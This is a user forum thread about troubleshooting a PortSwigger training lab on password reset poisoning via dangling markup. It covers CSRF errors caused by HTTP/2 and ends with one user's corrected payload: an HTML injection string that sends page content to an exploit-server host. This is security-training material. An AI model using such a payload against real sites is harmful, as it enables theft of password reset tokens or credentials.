Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Password reset poisonin via dangling markup

Dark | Last updated: Jun 05, 2021 12:43PM UTC

in the step 5 they all time show me that CSRF token is invalid. Even if I follow the video tutorial the thing is same. so help me to solve the lab.

Uthman, PortSwigger Agent | Last updated: Jun 07, 2021 10:12AM UTC

Thanks for reporting this. We have checked the lab and it appears to be functioning without any issues. Can you double-check that you are sending the correct request to the Repeater? If you believe there could be a bug, please email support@portswigger.net with a screen recording of your attempt.

Nstderr | Last updated: Apr 09, 2023 09:28PM UTC

I'm not sure how you determined it functions without issues, since the issue is with burp and its default settings. For anyone else that's having this "Parameter missing: 'csrf'" issue, it's due to Burp automatically changing the protocol to HTTP/2. If this is disabled in settings (Network>settings>http>uncheck "Default to HTTP/2 if the server supports it"), the csrf error is fixed.

Ben, PortSwigger Agent | Last updated: Apr 10, 2023 08:41AM UTC

Hi, Just to clarify, the initial response to this forum thread was made nearly two years ago prior to the labs supporting HTTP/2. In terms of the current issues with the lab - we are in the process of updating our instructions, where necessary, in order for them to still be relevant now that the labs do support HTTP/2. This looks like it is a lab that we need to address so we will discuss this with the wider team.

werthergotguns | Last updated: Sep 07, 2023 02:06PM UTC

There is a bug in the lab, you can solve it by enforcing the use of the HTTP 1.1 protocol in the proxy, before passing the request to repeater. Also, the payload in the lab solution doesn't work. This is the correct one: :'><a href="//exploit-TOKEN.exploit-server.net/?

Ben, PortSwigger Agent | Last updated: Sep 07, 2023 05:06PM UTC